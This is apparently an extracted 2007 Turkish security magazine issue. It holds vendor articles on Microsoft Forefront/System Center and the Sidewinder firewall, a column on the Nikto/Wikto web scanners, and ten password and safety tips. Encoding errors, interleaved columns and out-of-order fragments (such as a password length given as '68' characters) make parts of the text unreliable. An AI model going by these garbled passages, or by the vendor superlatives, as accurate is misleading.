Güvenlik hizmeti veren firmalar Foundstone kullanarak farkl› müflterilere tek bir sistem üzerinden hizmet verebilir. Her organizasyon kendi kullan›c›s›n› yaratabilir ve sistem üzerinde yarat›lm›fl di¤er organizasyonlardan ba¤›ms›z olarak risk analizlerini yapabilirler. McAfee Foundstone ile Risk Yönetimi A¤ustos 2007 beyazflapka 09 Agu’07 eskiz-6 7/31/07 12:35 AM Page 6 Mehmet Üner [email protected] Art›k Kontrol Sizde Günümüzde, BT yöneticileri ve BT çal›flanlar› birçok zorlukla karfl› karfl›ya bulunmaktad›r. Bunlar›n bafl›nda gittikçe karmafl›klaflan BT altyap›lar›n› baflar›l› bir flekilde idare etmek, çal›flt›klar› kurumlar›n sahip oldu¤u bilgileri korumak ve kurum çal›flanlar›na her yerden ve her cihazdan güvenli bir flekilde eriflimi sa¤layabilmek gelmektedir. K›saca Yönetim ve Güvenlik her kurumun BT altyap›s›n›n temelini oluflturan parçalar haline gelmifl durumdad›r. Bu durum asl›nda birçok ba¤›ms›z araflt›rma kuruluflu taraf›ndan da desteklenmektedir. Yak›n bir zamanda 2S’nin (System Management, Security), birbirinden ayr›lmaz bir bütün haline gelecekleri, bugün endüstrinin önde gelen analiz flirketleri raporlar›nda da yer almaktad›r. Bu stratejiyi, yani Sistem Yönetimi ile Güvenli¤i entegre bir flekilde uyarlayan ve çözümlerini bu do¤rultuda oluflturan flirketlerden biri de Microsoft’dur. Microsoft, bu alanlarda sahip oldu¤u tecrübelere, yapt›¤› yat›r›mlar› da ekleyince; Güvenlik ve Sistem Yönetimi alan›nda birçok ürün ve çözümü müflterilerine entegre bir flekilde sunmaya bafllam›flt›r. Microsoft güvenlik ürünlerini Forefront Ailesi ile tek bir çat› alt›na toplad›ktan sonra, yönetim ürünlerini de System Center Ailesi alt›na toplam›flt›r. (Resim 1) Bu iki Aile ile Microsoft, BT yöneticilerine ve çal›flanlar›na art›k “Kontrol Sizde” mesaj›n› vermektedir. Böylece kurumlar uçtan uca güvenlik ve uçtan uca yönetim ihtiyaçlar›n› karfl›layabilmektedir. Forefront ve System Center Ailelerinin lansmanlar› yurtd›fl›nda, geçti¤imiz aylar içinde yap›ld›. Türkiye tan›t›m› ise önümüzdeki Eylül ay›nda, birçok Microsoft ifl orta¤›n›n, yurtiçi ve yurtd›fl› konuflmac›lar›n›n kat›l›m› ile ayn› zamanda demo alanlar› ve müflteri hikayeleri ile birlikte oldukça genifl bir içerikle yap›lacak. çözümler ayr›ca fiziksel ve sanal ortamlar›n kapsaml› yönetimini sa¤layarak, verimli ve kontrollü gelifltirmelere olanak Microsoft Forefront Ailesi • Forefront Client Security • Forefront Server for Exchange Server • Forefront Server for SharePoint • Antigen for Instant Messaging • Internet Security and Acceleration Server 2006 • Intelligent Application Gateway 2007 • Kod Ad› “Stirling” Microsoft System Center Ailesi • System Center Operations Manager • System Center Configuration Manager • System Center Data Protection Manager • System Center Virtual Machine Manager • System Center Essentials • System Center Capacity Planner • System Center Service Desk (Resim 1) System Center Ailesini daha detayl› olarak incelersek, kendi kendini yöneten dinamik sistemler tasarlamay› amaçlayan Microsoft, bu aile ile gelifltirme, operasyon ve IT aras›ndaki, iflletim sistemi, uygulamalar, birleflik servis ve ifl ak›fllar›ndan kaynaklanan bofllu¤u; ba¤›ml›l›klar› de¤erlendirerek ve ifl süreci performans›n› optimize ederek kapatmaktad›r. Bu tan›maktad›r. System Center Ailesi ile kritik IT sistemleri, uygulamalar› ve servisleri güvenilir bir flekilde tamamen kontrol edilebilir. System Center’in temelini oluflturan iki önemli ürün, Configuration Manager (eski ad›yla SMS) ve Operations Manager (eski ad›yla MOM) bugün birçok kurum taraf›ndan da kullan›lmaktad›r. Kurumlar›n bugün en önemli ihtiyaçlar›ndan biri, IT ortamlar›n› monitör etmek ve neler olup bitti¤ini dinamik olarak gözlemlemektir. ‹flte System Center Operations Manager bu ihtiyaca, IT ortamlar›n› proaktif bir flekilde monitör ederek (Buna istemciler de dahil olmak üzere.) ve kritik uygulamalar için bir servis a¤ac› modeli oluflturarak cevap verebiliyor. Bununla beraber içine eklenmifl yönetim paketleriyle, uygulamalar› ve iflletim sistemlerini gelifltiren yaz›l›m ekiplerinin, bütün bilgisini IT yöneticilerine aktarmas› sayesinde, flirket kurumsal a¤›n›n oldukça önemli bir parças› oluyor. Bu özellikler d›fl›nda sahip oldu¤u Audit Collection Service (ACS) ile kurum içindeki bilgisayarlardan toplad›¤› loglar› merkezi olarak raporlayabiliyor ve bir sistem yönetimi ürününün güvenli¤e nas›l katk›da bulunabilece¤ini bizlere gösteriyor. T›pk› Operations Manager gibi System Center Configuration Manager, flirketlerin birçok önemli sorununa çözüm oluyor. Bütün istemciler ve sunucular üzerinde yap›lan manuel ifllemleri azaltarak, IT üretkenli¤ini ve verimini art›r›yor. ‹flletim sistemleri ve uygulamalar, Configuration Manager ile uzaktan yüklenebilir hale geliyor. Ayr›ca kapsaml› bir varl›k yönetimi ile kurumun sahip oldu¤u bütün varl›klar detayl› bir flekilde gözlemlenebiliyor. Microsoft’un sat›n ald›¤› Assetmetrix teknolojisi ile bir kurumun sahip oldu¤u yaz›l›mlar detayl› bir flekilde tür ve üretici bak›m›ndan kategorilendirilebiliyor ve hatta lisansl›, lisanss›z veya beta versiyon olup olmad›klar› bile raporlanabiliyor. Son olarak, istenilen konfigürasyon bilgisini oluflturmas› ve model tabanl› yönetimi sayesinde Configuration Manager, sistemlerin çok daha sa¤l›kl› ve performansl› çal›flmas›n› sa¤layabiliyor. Configuration Manager, t›pk› Operations Manager gibi kurumlar›n güvenli¤ine de katk›da bulunabiliyor. ‹flletim sistemleri için kritik yamalar› da¤›tmas› d›fl›nda, içinde bar›nd›rd›¤› MBSA (Microsoft Baseline Security Analyzer) özelli¤i sayesinde kurum içi bütün bilgisayarlardaki aç›klar› tarayabiliyor. Böylece IT yöneticileri bütün kurumdaki aç›klar› tek bir noktadan görebiliyor. Bu iki üründen bahsetmiflken System Center Essentials’dan da mutlaka bahsetmek gerekir. Özellikle orta ölçekli kurumlar için tasarlanm›fl olan bu çözüm, sunucular›n, istemcilerin, donan›m›n, yaz›l›m›n ve IT servislerinin görüntülemesine ve yönetilmesine olanak veren tek bir konsol sa¤layabiliyor. K›saca Configuration ve Operation Manager teknolojilerinin birleflmesinden ortaya ç›kan tek bir ürün ile IT altyap›s›n›n verimli ve basit bir flekilde yönetilmesine olanak sa¤l›yor. System Center Virtual Machine Manager ise, fiziksel sistemler d›fl›nda art›k hayat›m›z›n bir parças› haline gelen sanal sistemler üzerinde tam bir hakimiyet kurulmas›n› sa¤l›yor. Böylece fiziksel sistemlerin, sanal sistemlere geçiflleri, kapasite planlamas›, kaynak atanmas› gibi oldukça kar›fl›k ve zor olan ifller, System Center ailesinin bu yeni üyesiyle birlikte verimli bir flekilde yap›labiliyor. Basitlik bak›m›ndan ise, tek bir yönetim konsolu ile flirketin sahip oldu¤u bütün sanal altyap› yönetilebiliyor ve bütün sanal makineler ile konfigürasyon bilgileri merkezi olarak saklanabiliyor. System Center Data Protection Manager, kurumlar›n en önemli ihtiyaçlar›ndan birini karfl›l›yor: “Yedekleme”. Sundu¤u disk tabanl› yedekleme ve kurtarma çözümleri ve basit arayüzleri ile mevcut IT altyap›s›na entegrasyonu sayesinde IT yöneticilerini yedekleme ifllemlerinin kar›fl›kl›¤›ndan kurtar›yor. Aileye yeni kat›lacak üyelerden biri olan “System Center Service Desk” ise içinde de¤ifliklik, varl›k ve problem yönetimi bulunan, bir kurumun bütün servis yönetim ihtiyaçlar›n› karfl›layabilecek bir çözüm sunuyor. Service Desk’in en önemli özelliklerinden biri ise mevcut IT altyap›s› ile olan entegrasyonu ve bir çok yönetim ifllemini otomatik olarak sa¤l›yor olmas›. 2S’nin ikinci parças›na geçersek, Güvenlik (Security) alan›nda da Microsoft’un çözümlerinin uçtan uca ve detayl› olduklar›n› görebiliriz. Bunlardan belki daha da önemlisi Güvenlik Çözüm Ailesi Forefront’un, Art›k Kontrol Sizde 10 beyazflapka A¤ustos 2007 A¤ustos 2007 beyazflapka 11 Agu’07 eskiz-6 7/31/07 12:35 AM Page 7 System Center Ailesi ile tamamen entegre çal›flmas› ve sonuç olarak güvenli¤i maksimum ölçüde sa¤larken verimlili¤i ve basitli¤i de çok önemli özellikler olarak eklemesidir. Özellikle Microsoft uygulamalar› için özel olarak tasarlanm›fl Forefront Sunucu Uygulamalar› ile Exchange, Sharepoint ve Live Communications Server gibi uygulamalar tamamen güvenlik alt›na al›nabiliyor. Forefront sunucu ailesinin en önemli özelli¤i ise endüstrinin önde gelen antivirüs motorlar›n› içinde bar›nd›rmas› ve böylece kurumlara birden fazla motorun gücünü sunabilmesidir. Kurumsal A¤’›n oldukça önemli bir parças› olan Forefront Client Security, sunucu ve istemci iflletim sistemlerine kurularak, dosya sistemi seviyesinde zararl› yaz›l›mlara (virüs, spyware, rootkit) karfl› etkin bir koruma sa¤layabiliyor. Forefront Client Security, Operations Manager, WSUS, Active Directory ve SQL ile entegre çal›flarak bir güvenlik ürünün asl›nda yönetim bak›m›ndan ne kadar etkin bir flekilde kullan›labilece¤ini bizlere göste-riyor. Forefront ve System Center Ailelerinin entegre bir flekilde çal›flt›¤›n› belki de bize en güzel gösteren ürünlerden biri olan Client Security, sa¤lad›¤› korumalar d›fl›nda yapt›¤› hassasiyet analizleriyle de kurumlar› IT denetimleri için haz›rlayabiliyor. Kurumlar ile internet aras›ndaki d›fl ba¤lant› noktas›nda Microsoft Forefront Ailesi iki güvenlik ürünü ile kurumlara çözümler sunuyor. ISA 2006 ve IAG 2007, bugün Forefront’un d›fl ba¤lant› ürünlerini oluflturuyorlar. Köklerin-de bir proxy sunucusu olmas›na ra¤men bugün geldi¤i noktada komple bir güvenlik çözümü haline dönüflen ISA 2006, içinde bar›nd›rd›¤› Firewall, IPSEC VPN, Sald›r› Tespit ve Önleme, Caching, Load Balancing ve Proxy teknolojileri ile Kurumsal A¤ ve ‹nternet aras›nda maksimum bir koruma sa¤layabiliyor. Ayr›ca gelecek sene gelifltirilmesi planlanan ISA 2008 sürümü ile de çok daha fazla güvenlik özelli¤ini içinde bar›nd›racak bir duruma geliyor. Günümüzde kurumlar›n duydu¤u en önemli ihtiyaçlardan biri de kurumsal a¤a güvenli bir flekilde uzaktan eriflimdir. Forefront Güvenlik Ürün Ailesi ile Microsoft iki temel çözümü kurumlar›n hizmetine sunuyor. Kullan›c› bilgisayarlar›na bir program kurulmak isteniyorsa veya iki Firewall aras›nda bir site-to-site VPN yap›lmak isteniyorsa, ISA 2006’›n sahip oldu¤u IPSEC VPN teknolojisi kullan›labiliyor. E¤er kullan›c› bilgisayarlar›na program kurulmak istenmiyor fakat kurumsal a¤ içindeki bütün kaynaklara güvenli bir flekilde internetten eriflilmek isteniyorsa, IAG 2007 (Intelligent Application Gateway 2007)’in sahip oldu¤u SSL VPN teknolojisi kullan›labiliyor. IAG 2007 ile kullan›c› bilgisayarlar›na program kurulmad›¤› için, kullan›c›lar internete ba¤l› herhangi bir bilgisayardan kurum a¤›na ba¤lanabiliyor. Bu noktada ise IAG’nin sahip oldu¤u son nokta kontrolü teknolojisi ile kullan›c›n›n bir kiosk’tan m› yoksa yönetilen bir istemci’den mi geldi¤i tespit ediliyor. Tamamen rol ve politika tabanl› kontroller ile maksimum güvenlik sa¤lan›rken, attachment viper teknolojisi ile kullan›c› oturumunda oluflturulan bütün bilgiler oturum sonunda temizlenebiliyor. Böylece bir kiosk’tan ba¤lanan istemcilerde herhangi bir bilgi b›rak›lm›yor. Sonuç olarak kurumlar, Microsoft’un Güvenlik Ailesi Forefront ve Yönetim Ailesi System Center ile Bilgi Teknolojileri Altyap›lar› Üzerinde Tam Bir Kontrole Sahip Oluyorlar. ‹ki ürün ailesi hakk›nda daha fazla bilgi almak için, Eylül ay›ndaki etkinli¤i kaç›rmaman›z› tavsiye ederiz. Microsoft’un Güvenlik Ailesi Forefront ve Yönetim Ailesi System Center Art›k Kontrol Sizde 12 beyazflapka A¤ustos 2007 Art›k Kontrol Sizde A¤ustos 2007 beyazflapka 13 Agu’07 eskiz-6 7/31/07 12:35 AM Page 8 Nil ALTINUS [email protected] Sidewinder® Network Gateway Security IT çevresindeki h›zl› de¤iflikliklere ayak uydurabilmek için gateway güvenli¤i birçok önemli özelli¤e sahip olmal›d›r. ‹flte Secure Computing’in Sidewinder® Network Gateway Güvenlik cihaz› tüm bu özelliklerin yan›nda çok daha fazlas›na sahiptir. Günümüzde birçok iflletme ‹nternet kullan›m›n›n zorunlulu¤una inansa da, ‹nternet kullan›m›n›n faydalar›n›n yan›nda risklerinin de bulundu¤unun fark›ndad›r. Herhangi bir iflletme, a¤›n› ‹nternet’e ba¤lad›¤›nda sadece çal›flanlar›na ‹nternet servislerini sunmaz, bunun yan›nda kendi firmas›n›n bilgilerini de d›fl kullan›c›lara açm›fl olur. Bu nedenle, firma özel bilgilerinin çal›nma, de¤ifltirilme, yokedilme vs. gibi ataklardan korunup, a¤›n güvenli¤inin sa¤lanmas› için “firewall” teknolojisi gelifltirilmifltir. 1990’lar›n bafl›ndan itibaren a¤lar›m›z›n vazgeçilmez parças› halini alan firewall’lar, 1989 y›l›nda Bell Labs’dan Steve Bellovin taraf›ndan “Onlardan gelecek herhangi bir de¤er için bizi ve onlar› ay›ran cihaz” olarak tan›mlanm›flt›r. Sektörde rekabet eden onlarca firewall markas› olmas›na ve bu cihaza olan ihtiyac›n artmas›na ra¤men, son kullan›c›lar hala bu cihazlar›n temel farkl›l›klar› ya da çal›flma prensipleri hakk›nda yeterince bilgiye sahip de¤ildir. Sidewinder: Sektörün En Güçlü Firewall Korumas› Tüm ana güvenlik özelliklerini kendinde birlefltiren Secure Computing’in Sidewinder® Network Gateway Güvenlik cihaz›, dünyadaki en güçlü firewall’dur. Kapsaml› yüksek h›zdaki uygulama proxyleriyle birlikte infla edilmifl, TrustedSource™ reputation-tabanl› global zeka ve imza tabanl› servislere sahip Sidewinder, bilinen ve bilinmeyen tüm tehditlerden a¤›n›z› ve internet uygulamalar›n›z› korur. Tüm bunlar›n ya-n›nda çal›flanlar›n›z›n internet kullan›m›n› görüntüler ve yö-netimini sa¤lar, paketlerdeki gizli ataklardan korur, virüsleri ve dosya transferindeki Spyware’i bloklar, detayl› raporlama sa¤lar. Bafll›ca özellikler: • Gigabit h›z›nda uygulama seviyesi firewall’udur. • Sektördeki “deep inspection” firewallar›ndan 3-4 kez daha h›zl›d›r. • 5 ya da daha fazla güvenlik sistemini tek bir cihazda toplar • Reputation-based global intelligence olan ilk ve tek firewall’dur. • ASIC h›zland›rmas›yla yeni nesil IPS (atak önleme-intrusion prevention) sahiptir. • Otomatik olarak zero-hour ataklar› durdurur. • 200.000’i aflk›n atak imzas›na sahiptir. • Yüksek seviyeli güvenlik için eflsiz üne sahiptir. • CERT dan›flman› olmayan tek firewall. • Hardware çözümü Patentli SecureOS® teknolojisine sahiptir. • Gerçek zamanl› görüntüleme, alarm ve raporlama sa¤lar. Firewall/VPN Sidewinder’›n gateway güvenlik ihtiyaçlar› için dünya klasman›ndaki firewall korumas›, donan›m›n›, stateful inspection ve deep application-layer filtreleme sa¤layan birçok filtreleme teknolojisinin en kapsaml› özellikleriyle birlefltirir. Firewall/VPN ve bu güvenlik özellikleri (reputation servisleri, anti-virus, anti-spam, URL filtreleme ve SSL flifre çözücü) Secure Computing’in patentli Type Enforcement teknolojisi ile korunmaktad›r. Sidewinder, seçkin EAL4+ Common Criteria sertifikasyonuna sahip tek gateway cihaz› olma özelli¤inin yan›nda, 11 y›l› aflk›n süredir hiç acil güvenlik yamas› yay›nlamam›flt›r. IPSec VPN Sidewinder, a¤a uzaktan eriflim için en yeni IPSec VPN teknolojisi, hem gateway to gateway VPN hem de client to gateway VPN’i kullanmaktad›r. Kullan›m kolayl›¤›, birlikte ifllerlik ve performans önemli özelliklerinden birkaç›d›r. t›lar› reddederek, a¤lara s›zan mail trafi¤ini ortadan kald›r›r. Sonuç olarak, mail sunucular›n›z›n ifllem süresini düflürür, a¤ bant geniflli¤i eriflilebilirli¤ini artt›r›r, a¤ altyap› maliyetini düflürür, tüm güvenlik durumunu gelifltirirken; istenmeyen mailler kritik mail sunucular›n›za ulaflamadan yok edilir. UTM - Unified Threat Management Unified Threat Management, geliflen firewall pazar›nda 2004’ten bu yana bir trend haline gelmifltir. UTM sistemleri minimum cihaz olmas›n›n yan›nda çoklu güvenlik sistemi, OS, Firewall, IPS, Antivirus özelliklerine sahip olmal›d›r. Sidewinder, di¤er UTM ve Firewall ürünlerinin sa¤lad›¤›ndan daha iyi yönetim, kontrol ve daha fazla güvenlik sa¤lamaktad›r. Bu da onu, s›n›f›n›n en iyi UTM cihaz› yapar. Intrusion Prevention (IPS) and Automated Response Sidewinder, çok katmanl› atak önleme (IPS) çözümü sa¤lamaktad›r. S›n›f›n›n en iyi IPS servislerini di¤er atak önleme güvenlik metodlar›yla birlefltirir. Endüstri lideri, full içerik denetimini multi-gigabit throughputla yapan yüksek h›z uygulama proxyleri, kendi antivirüs servislerini kullanarak worm, virüs, trojan ve spyware imza taramas›, kendi antispam servislerini kullanarak spam imza taramas›, TrustedSource servisini kullanan mail-discard servisleri, Smartfilter servisini kullanan URL bloklama özelliklerini içerir. Sidewinder, a¤lar için reputation-based güvenli¤ini kullanan ilk ve tek Firewall’dur. Ayr›ca Secure Computing’in endüstri lideri reputation servisi, TrustedSourse ile birlikte çal›flmaktad›r. Bu özellik Sidewinder’a proaktif güvenlik kararlar almas›n› sa¤lar. A¤ güvenlik ürünleri, zararl› içerikleri ve hackerlar› flirket sistemlerinden uzak tutabilmek için sürekli gelifltirilmelidir. Internet ve e-mail kullan›m› flirketlerde çok yayg›nd›r ve d›flar›dan gelen malware, içeriden gelen veri s›z›nt›s› ya da politika ihlallerine karfl› özel, uygulama-spesifik güvenlik yaklafl›mlar› gerektirir. Bunlar uygulama seviye korumas›n› temsil eder ve güvenlikle ilgili kararlar almak için amaca yönelik tasarlanm›fl cihazlar›n üstüne entegre edilmelidir. Çift yönlü güvenli¤e sahip ve TrustedSource’u kullanan platformlar› kullanarak yeni nesil uygulama seviyesi güvenlik özelliklerini kendi üzerinde bar›nd›ran ve tüm ürün ailesi uygulama spesifik olan Secure Computing’in Gateway Güvenlik çözümleri, dünya çap›nda bir numaraya yükselmifltir. Sidewinder müflterileri bu hizmetten nas›l faydalan›rlar? Bu özellik, büyük hacimdeki istenmeyen ve zararl› olan maillerin a¤›n›za ulaflamadan otomatik olarak yok edilmesini sa¤lar. Zombi cihazlardan ya da spam göndericilerden gelen ba¤lan- Kapsaml› gateway güvenli¤ine olan ihtiyaç ortadad›r. Tehditler geliflip ço¤almaya devam ettikçe, Secure Computing; organizasyonlara güvenli internet ba¤lant›s› sa¤layan endüstri lideri çözümler sunmaya devam edecektir. Global-Intelligence ile TrustedSource Reputation-Based Güvenlik Sidewinder Güvenlik Ürün Ailesi Sidewinder® Network Gateway Security 14 beyazflapka A¤ustos 2007 Sidewinder® Network Gateway Security A¤ustos 2007 beyazflapka 15 Agu’07 eskiz-6 7/31/07 12:35 AM Page 9 Erkan fiEN – Nebula Biliflim [email protected] Underground Yeni bir say› ve yeni bir araç ile yeniden merhabalar. Asl›nda bu say›m›zda Nikto’dan bahsetmek istiyordum. Çünkü birçok uzman için oldu¤u gibi ben de ürünlerin Unix/Linux sürümlerini kullanmay› tercih ediyorum. Ancak günümüzde birçok sistemde Windows kullan›ld›¤›n› düflünerek, Wikto’dan bahsetmeyi daha uygun gördüm. Asl›nda Nikto ve Wikto ayn› ifli yapan, arkalar›nda hemen hemen ayn› kodlar çal›flan iki farkl› yaz›l›m. Wikto kurulduktan sonra kullan›ma bafllaman›z için yapman›z gereken tek fley “System Config” bölümü alt›nda “Database Locations” sekmesinden güncelleme ifllemlerini yapman›z olacakt›r. kullan›r. Bu imza bilgi bankas› Wikto taraf›ndan otomatik olarak indirilebilir ve kullan›ma al›nabilir. herfley için kullan›c› uygulama bilgileri, ba¤lant› zaman› v.b. bilgileri web sunucusuna sa¤lar. Wikto birçok Windows uygulamas›nda oldu¤u gibi h›zl›ca kullan›ma geçebilmeniz için size bir sihirbaz ekran› da sa¤lar. Aç›kcas› bu sihirbaz›n kullan›l›p kullan›lmamas› tamamen size ba¤l› çünkü sihirbaz çok da fazla detayl› ayar yapman›za izin vermiyor. E¤er IDS/IPS cihazlar›n›z› test etmek ve geride ayak izleri b›rakmadan ifllem yap›p yapamayaca¤›n›z› görmek istiyorsan›z yine komut sat›r›na dönmeli ve Nikto kullanmal›s›n›z. Wikto varsay›lan web sayfalar›n›, web suncusunun ve bu sunucu üzerinde bulunan CGI sayfalar›n›n güvenli¤ini test etmek üzere ayarlanm›fl bir yaz›l›m oldu¤u için, ActiveX ve ISAPI gibi kaynaklar›n aç›klar› ile çok fazla ilgilenmez. Uyar›lar Son olarak yine belirtmek isterim ki burada bahsetti¤imiz araçlar›n tamam› kendi sistemlerinizi test etmeniz ve olas› ataklara karfl› sisteminizi koruman›z için kullan›lmal›d›r. Burada sözü edilen araçlar›n yanl›fl kullan›mlar› sisteminize ve a¤ ortam›n›za çeflitli zararlar verebilir. Bu yüzden bu araçlar› mümkün oldu¤unca test ortamlar›n›zda denemeye dikkat edin. Nikto/Wikto nedir? Nikto içinde 3300 potansiyel tehlikeli olabilecek CGI kodu, 625’den fazla sunucu sürümü ve 230 adet bu sunuculara ait problem testlerini bulunduran aç›k kaynak kodlu (GPL) bir web sunucusu tarama yaz›l›m›d›r. Nikto’nun tarama bilgi bankas› ve kod k›s›mlar› s›kl›kla güncellenmektedir. Nikto ayn› zamanda LibWhisker gibi kullan›fll› baz› eklentilerle, IDS/IPS cihazlar› içinde denemek isteyebilece¤iniz bir test arac›na dönüflebilir. Ayr›ca Nikto web yöneticilerine de sa¤lad›¤› raporlar yard›m› ile faydal› olabilir. Bu kadar Nikto’dan bahsettikten sonra art›k esas konumuz olan Wikto’ya dönebiliriz. Yukar›da da belirtti¤im gibi Nikto ve Wikto asl›nda ayn› ifle odaklanm›fl iki farkl› yaz›l›m. Afla¤›da da görebilece¤iniz gibi Nikto komut sat›r›ndan yönetilen bir araç. Wikto ile yapt›¤›n›z tarama sonucunda, yaz›l›m›n imza bilgi bankas›nda bulunan ve hedef sunucu üzerinde test etti¤i tüm bilgilerin sonuçlar›n› ayr› ayr› görebilirsiniz. E¤er burada varolan bir aç›k veya CGI üzerinde yanl›fl bir kod v.b. varsa rahatl›kla tesbit edebilirsiniz. Bunun d›fl›nda yukar›da da bahsetti¤im gibi bu tarama sonuçlar› web yöneticileri için de çok faydal› bilgiler içeriyor olabilir. Wikto tarad›¤› her sunucuda ayak izleri b›rak›r Wikto tarad›¤› sunucular üzerinde iz b›rak›r. Yani test etti¤i Underground 16 beyazflapka A¤ustos 2007 E¤er bu ve bunun gibi test araçlar›n› uygulama ortam›nda deneyecekseniz, mutlaka ilgili birimleri bundan haberdar edin ve elinizde sistemlerin yedeklerinin oldu¤una emin olun. Kullan›c› dostu grafik arabirim Wikto’yu seçmemin sebeplerinden biri de Windows üstünde kullan›c› dostu ve çok fazla sorun ç›kartmayan bir arayüzü olmas›. Afla¤›da Wikto’nun standart arayüzünü görebilirsiniz. Wikto imza bilgi bankas› olarak Nikto ile ayn› kaynaklar› H›zl› ve kolay kurulum Wikto’yu kullanmak için di¤er birçok yaz›l›m›n aksine çok fazla birfley yapman›za gerek yok. Sadece yaz›l›m› indirerek kurulum ifllemini yapman›z yeterli. (Kurulum aflamalar› çok basit oldu¤u için burada detaylara girmeye gerek görmüyorum.) Farkl› özellikler Wikto Spider, Googler, GoogleHacks gibi bir tak›m özellikler de sunar. Bu özelliklerin baz›lar› bilgi toplamak GoogleHacks gibi baz›lar› ise çok bilinen atak yöntemlerini kullan›m›n›za sunar. Afla¤›da ilgili yaz›l›mlar›n ve kaynaklar›n web adreslerini bulabilirsiniz. Görüfllerinizi benimle paylaflmak ve tüm sorular›n›z için yukar›daki e-posta adresinden bana ulaflabilirsiniz. Bir sonraki say›da buluflmak dile¤iyle... Kaynakça http://www.cirt.net http://www.sensepost.com/research/wikto/ Underground A¤ustos 2007 beyazflapka 17 Agu’07 eskiz-6 7/31/07 12:35 AM Page 10 Luc Erol ALPTUNA – Trend Micro [email protected] Fazla Güvenlik Göz mü Ç›kar›r? Güvenlik ‹çin Kullan›c›lara 10 Tavsiye Ya bu deveyi güdece¤iz, ya bu diyardan gidece¤iz. “Ben deveyi güdece¤im” diyenlerdenseniz, güvenli ‹nternet için neler yapmam›z gerekti¤ini tekrar hat›rlatal›m. fiu hayat mücadelesinde karfl›m›za ç›kan sorunlarla bo¤uflmam›z yetmezmifl gibi bir de bilgisayarlarla ilgili sorunlarla u¤raflmam›z kendi içinde bir çeliflki gibi görülebilir. Asl›nda gerçekten de bir çeliflkidir. Güya hayat›m›z› kolaylaflt›rmak için ald›¤›m›z bilgisayarlar, zaman içinde, bizi hayata küstüren, bunal›ma düflüren, içkiye, sigaraya hatta psikiyatr ziyaretlerine bafllatan birer “huzur bozucu” kimli¤ine kolayca bürünebilirler. Virüs, solucan, çöp mesaj yani spam, bilgisayar korsan›, flifre h›rs›zl›¤› derken, insan› do¤du¤una piflman eden bilgisayarlar› güvenli bir flekilde kullanmak için oturup adeta ders çal›flmam›z gerekiyor. Peki neden bu kadar s›k›nt›ya girmeden kullanabilece¤imiz bir bilgisayar yapm›yorlar, bir ‹nternet yaratm›yorlar? Bu kadar s›k›nt› çekmek kaderimiz mi? 1977 y›l›nda Cem Karaca, “Yoksulluk Kader Olamaz” diyordu. Aradan 30 sene geçti ve flimdi bizlerin “Güvensiz Bilgisayar Kader Olamaz” diye flark›lar düzüp, ellerimizde pankart ve dövizlerle meydanlara inmemize az kald›. “Ya sab›r” çekiyoruz. fiifreler, Ah O fiifreler! Düflünün, hangi normal insan, bu kadar çok ve karmafl›k flifreyi akl›nda tutabilir? En az 8 haneli, büyük ve küçük harflerden ve rakamlardan, sözlüklerde yer almayan ifadelerden oluflacak diziler… Üstelik her bir Web sitesi, bankac›l›k, e-Ticaret vs. flifresinin de yüksek güvenlik standartlar›n› tutturmak ad›na birbirinden farkl› olmas› gerekiyor. Elbette mümkün de¤il. O nedenle, insanlar ya flifrelerini bir yerlere not ediyor ve kullanaca¤› zaman aç›p bak›yor ya da her flifreyi birbiri ile ayn› olan ifadelerden seçiyor. güvenli¤i gibi bir kayg› tafl›m›yordu. ‹nternet’in de babas› olan bu proje ve onun benimsedi¤i protokol, yani ba¤lant› kurma sistemi bugün de kullan›l›yor ve çok ciddi güvenlik zaaflar›n› bünyesinde bar›nd›r›yor. 2007 y›l›nday›z ve hâlâ 1969’un o zay›f teknolojisini kullan›yoruz. O nedenle, hâlâ bilgisayar korsanlar›n›n önünde flifrenizi k›rman›n çok çeflitli yöntemleri var. Hatta ben size flunu ç›tlatay›m: TCP/IP protokolü ile gönderilen flifreler, herhangi bir gizlili¤e tabi olmadan karfl› tarafa ulafl›yor. fiifreleri gizlemek için ek protokoller ve yöntemler kullan›lmasayd›, flifreleriniz kabak gibi meydanda kal›rd›. 1. fiifre ve parolalar›n›z› kolay tahmin edilemeyecek, sözlüklerde bulunmayan sözcüklerden seçin; mümkünse harf, rakam ve büyük harf-küçük harf kombinasyonlar›n› kullanarak en az 68 haneli flifreler oluflturun. Çünkü hiç kimse, ‹nternet’in ticari bir amaçla kullan›labilece¤ini, bütün dünyaya yay›labilece¤ini düflünmemiflti. Güvenlik kimsenin umurunda de¤ildi. So¤uk Savafl y›llar›nda askerî amaçlarla, tehdidin azalmas›na paralel olarak da akademik kurumlar aras›nda kullan›lmas› öngörülen bir sistemdi sadece. 2. fiifre ve parolalar› herhangi bir yere kesinlikle not etmeyin. 3. Baflkalar›na flifrenizi söylemeyin. ‹sviçre’deki CERN adl› nükleer fizik ve uygulamal› bilimler araflt›rma kurumunda görevli Tim Berners Lee adl› temiz yüzlü bir bilim adam› World Wide Web’i yani www’yi icat etmeseydi, bu durum de¤iflmeyecekti. Ama Lee bu icad› yap›p üstüne üstlük bir de insanl›¤a ba¤›fllay›nca bu hallere düfltük. (Biz bu hallere düfltük, Lee’ye ise flövalye unvan› verildi.) 4. ‹nternet Cafe’ler, bilgisayar odalar› gibi topluma aç›k bilgisayarlarda ‹nternet bankac›l›¤›n› ve e-ticaret sitelerini kullanmaktan kaç›n›n. 5. Ayn› flifreleri uzun süre kullanmay›n. Bugün ‹nternet’i hayat›m›zdan söküp atman›n, bilgisayarlarla vedalaflman›n yolu yok. ‹nternet daha güvenli hale gelinceye kadar, bundan daha iyisini de bulamayaca¤›z. O halde, uzmanlar›n dediklerine kulak vermeli ve harfiyen yerine getirmeliyiz. 6. ‹nternet üzerinden gerçeklefltirece¤iniz ifllemler bitti¤inde, ç›kmak için muhakkak "ÇIKIfi" ikonu kullan›larak oturumu kapat›n. 7. Bankan›z sunuyorsa tek kullan›ml›k dinamik flifreler türeten elektronik cihazlar› kullan›n. Bir baflka ifadeyle güvenli¤in afl›r›s›, hayat›m›z› çekilmez k›l›yor, ömrümüzden ömür eksiltiyor. Fakat, uzmanlar bize iflkence etmekten haz ald›klar› için mi bu kadar dikkatli olmam›z› istiyor? Durun bir dakika, gerçekte bizim iyili¤imizi istiyor olmas›nlar? 8. Bir antivirüs ve güvenlik duvar› yaz›l›m› edinin ve s›k s›k güncelleyin. Onlars›z ‹nternet’e ad›m›n›z› atmay›n. (Çok ciddiyiz. Sözümüze güvenin.) 9. Web taray›c›lar›n›n ve iflletim sistemlerinin güvenlik yamalar›n› mutlaka yükleyin. Uzmanlar Hakl›… Çünkü ‹nternet’in temeli, güvenlik aç›s›ndan deniz kumuyla 